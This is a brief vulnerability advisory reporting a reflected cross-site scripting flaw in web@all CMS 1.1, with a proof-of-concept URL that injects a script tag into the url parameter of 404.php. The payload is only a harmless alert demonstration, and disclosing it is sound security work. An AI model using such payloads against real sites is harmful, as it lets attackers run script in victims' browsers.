web@all CMS version 1.1 suffers from a reflective cross site scripting vulnerability.
57bd3adca6030bc7c3fc88109e59e2ab1232833c9de24e4bdef53b9da971e6ed
------------------------------------------------------------------------
Software................web@all CMS 1.1
Vulnerability...........Reflected Cross-site Scripting
Download................http://webatall.com/
Release Date............1/24/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in web@all CMS 1.1 can
be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E